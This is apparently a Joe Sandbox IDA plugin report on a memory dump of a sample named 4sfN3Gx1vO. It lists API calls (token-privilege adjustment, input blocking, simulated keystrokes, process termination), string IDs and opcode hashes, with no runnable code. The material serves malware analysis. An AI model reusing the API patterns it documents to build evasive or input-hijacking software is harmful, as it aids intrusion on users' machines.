                                                • Opcode ID: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
                                                • Instruction ID: 97260a61659f020e052c7f1a407080e120ad8ae6da29ee8d527df9d05606bc67
                                                • Opcode Fuzzy Hash: c8c7cfe43975fe371337c872d3ecfa002b006c502362fbed1bf106f54566f85b
                                                • Instruction Fuzzy Hash: C2115E75E05228BFDB108F95EC45FAFBFBCEB45B50F108156F908E7290D6704A059BA1
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0057168C
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 005716A1
                                                • FreeSid.ADVAPI32(?), ref: 005716B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
                                                • Instruction ID: 176b2a6727dfe6d7a91da12daf738ecc5d2fe21a0fde1488a30f27f53cf86fe0
                                                • Opcode Fuzzy Hash: 94809f7e001e4ed01662eaaf9c3d4e79071f6493883b96a9ddbf9ebd256bffaa
                                                • Instruction Fuzzy Hash: 89F0F47195030DFBDB00DFE49D89AAEBBBCFB08604F508565E501E2181E774AA489A54
                                                APIs
                                                • GetCurrentProcess.KERNEL32(005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D09
                                                • TerminateProcess.KERNEL32(00000000,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000,?,005428E9), ref: 00534D10
                                                • ExitProcess.KERNEL32 ref: 00534D22
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
                                                • Instruction ID: ecd0645cbbe328e136bc984cf64a200a30c7cdb28f7f02806e61409061b09998
                                                • Opcode Fuzzy Hash: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
                                                • Instruction Fuzzy Hash: 2FE0B631000149ABCF11AF54DD09A593F69FB92785F104814FC059A132CB35ED46DE80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /
                                                • API String ID: 0-2043925204
                                                • Opcode ID: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
                                                • Instruction ID: fb6652b98a3781b2f5a12221a0e427bcc911ea91ff4d2165c1d4f8dfa6b6fc82
                                                • Opcode Fuzzy Hash: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
                                                • Instruction Fuzzy Hash: 7E410376901219ABCB209EB9CC89EFB7FB8FBC4318F504669F905D7180E6709D818B50
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,?), ref: 0056D28C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: NameUser
                                                • String ID: X64
                                                • API String ID: 2645101109-893830106
                                                • Opcode ID: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
                                                • Instruction ID: 34cacf5799088c056a9b5001acc38c10fcd8f24555b7ad87b395c2364a787781
                                                • Opcode Fuzzy Hash: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
                                                • Instruction Fuzzy Hash: 84D0CAB880116DEACB94CBA0EC8CDDEBBBCBB15305F100A92F506A2040EB3496489F20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                • Instruction ID: fcaf572f7ff181801ed2caa820e665f338e686476372e5d8e27cefae35fad23e
                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                • Instruction Fuzzy Hash: E8020B72E002199BDF14CFA9C8906ADBFF5FF88314F25816AD819FB285D731AD418B94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Variable is not of type 'Object'.$p#^
                                                • API String ID: 0-3707816926
                                                • Opcode ID: 607fbb545c62b91e5e6cfee59dec75b3a9caa98151dd821c5a9c170d6b15fc32
                                                • Instruction ID: 2807d7fc1836201bd9873582010fc7f00350088419aac3f565dcc528cbf25a3d
                                                • Opcode Fuzzy Hash: 607fbb545c62b91e5e6cfee59dec75b3a9caa98151dd821c5a9c170d6b15fc32
                                                • Instruction Fuzzy Hash: 1C32C030940219DFEF14DF90D885AEEBFB9FF45304F108459E806AB292D736AD86CB60
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00586918
                                                • FindClose.KERNEL32(00000000), ref: 00586961
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
                                                • Instruction ID: 92dfe15808c49cd0ccfba3780411d71d20029e8ed3f7a5579bcaf8d9de36e887
                                                • Opcode Fuzzy Hash: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
                                                • Instruction Fuzzy Hash: D71190356042019FD710DF29D489A16BFE5FF89328F14C699E8699F7A2CB30EC45CB91
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837E4
                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
                                                • Instruction ID: a6f8d38a89109b4b3722f9ac3bc4949022bce98d14447c11d8e8f71cdf397620
                                                • Opcode Fuzzy Hash: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
                                                • Instruction Fuzzy Hash: 7DF0EC706042152AE71067654C4DFDB3F9DFFC5B61F000175F905E2281D9609D48C7B0
                                                APIs
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0057B25D
                                                • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0057B270
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: InputSendkeybd_event
                                                • String ID:
                                                • API String ID: 3536248340-0
                                                • Opcode ID: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
                                                • Instruction ID: fa89f0b1796bb0ab1996e96e381df4b7cf9068d0bd5d1a0053f1d3c435a53079
                                                • Opcode Fuzzy Hash: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
                                                • Instruction Fuzzy Hash: 8CF01D7580424DABEB059FA0D805BBE7FB4FF09309F008409F955A5192C3798615AF94
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
                                                • CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                • String ID:
                                                • API String ID: 81990902-0
                                                • Opcode ID: b71e833ee5e7f328f20a3935f52b822c6ae686643d819bcbc8cb8507f77ef99b
                                                • Instruction ID: a9e1315f29f48ef04729aaa2af4eb85710bee989828662f9d1c3b48f999a4b77
                                                • Opcode Fuzzy Hash: b71e833ee5e7f328f20a3935f52b822c6ae686643d819bcbc8cb8507f77ef99b
                                                • Instruction Fuzzy Hash: 52E04F32004611AFE7252B11FC09E777FA9FF05310B10882EF4A6804B1DB626C90EB14
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00546766,?,?,00000008,?,?,0054FEFE,00000000), ref: 00546998
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
                                                • Instruction ID: e93db8e4fcc023ba353d75c78951ea72e99b9ec9bab419e8e81d22aa8d84caec
                                                • Opcode Fuzzy Hash: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
                                                • Instruction Fuzzy Hash: 22B15B31610609DFD719CF28C48ABA57FE0FF46368F258658E899CF2A2C335E991CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
                                                • Instruction ID: 5c5ea13b49c66f16d1b63a57e8fba0a420e47a1751b90403a6d7de34746e4853
                                                • Opcode Fuzzy Hash: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
                                                • Instruction Fuzzy Hash: 06126F75A002299BDF14DF58D8806FEBBF5FF59310F14859AE849EB291DB309E81CB90
                                                APIs
                                                • BlockInput.USER32(00000001), ref: 0058EABD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: BlockInput
                                                • String ID:
                                                • API String ID: 3456056419-0
                                                • Opcode ID: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
                                                • Instruction ID: e0f9a164f958f0ca17671cc39ec2c663608b09c8ba1b3d21dd89983a255078c8
                                                • Opcode Fuzzy Hash: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
                                                • Instruction Fuzzy Hash: EAE01A312002059FE710EF59D809E9ABFE9BF99760F008416FC49D7351DA70E8818B90
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005303EE), ref: 005309DA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
                                                • Instruction ID: 6731236b3270fc932bb6af9d12ce81b37ddfd2a7c636efd81943a63c572f10a7
                                                • Opcode Fuzzy Hash: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                • Instruction ID: c72c856620d185eec990f30792e31fc344d2dd9885a31418fd5a459ee12330fe
                                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                • Instruction Fuzzy Hash: EF516CF2E0C74E6BDB384568485E7BEAFC5BB5E340F180A49E982D7382C615DE01D355
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0&^
                                                • API String ID: 0-2485633877
                                                • Opcode ID: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
                                                • Instruction ID: efdc774adaccca72eb9060afdade9a38d72b28871f9316ceea658329a6bf2281
                                                • Opcode Fuzzy Hash: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
                                                • Instruction Fuzzy Hash: DE21D5326206518BDB2CCE79C82767A77E9B7A4310F14862EE4A7D73D0DE75A904DB80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
                                                • Instruction ID: 538f5619cd2a7d3531932885f1cc1bcf4285ae1ba0609ecf9c2ad259a2c2a61d
                                                • Opcode Fuzzy Hash: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
                                                • Instruction Fuzzy Hash: 28324431D28F054EDB639634C8223756A8DAFBB3C9F15C737E81AB59A6EB28D4835100
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
                                                • Instruction ID: b4b2b6670b6a46d1a79ee37a0e1aa948a2e83be6d24b152ad9c1740506fc0e11
                                                • Opcode Fuzzy Hash: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
                                                • Instruction Fuzzy Hash: 1132F232A001658BDF28CE69D89467D7FA1FF46300F28856BD4EADB792D630DE81DB41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eecc1533485a4c2fd750e087535616ecf4d5019415d79d3031f2614d04daca0d
                                                • Instruction ID: 96dd3358aa9fc646125892e4841828c2d94547bf540d9603fff657cf00a5c39a
                                                • Opcode Fuzzy Hash: eecc1533485a4c2fd750e087535616ecf4d5019415d79d3031f2614d04daca0d
                                                • Instruction Fuzzy Hash: 5A22B270A0460ADFEF14CF68D865AEEBBB5FF48301F10452AE816A7291FB35AD54CB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d770ef0d9a7176a2467d92ad6cdde11272bfe1d777bf8cdb7839571a0c374b85
                                                • Instruction ID: 569ac9444a55ac1755b9f3dd5d1498b080e8181ff17d1e372d27061967790070
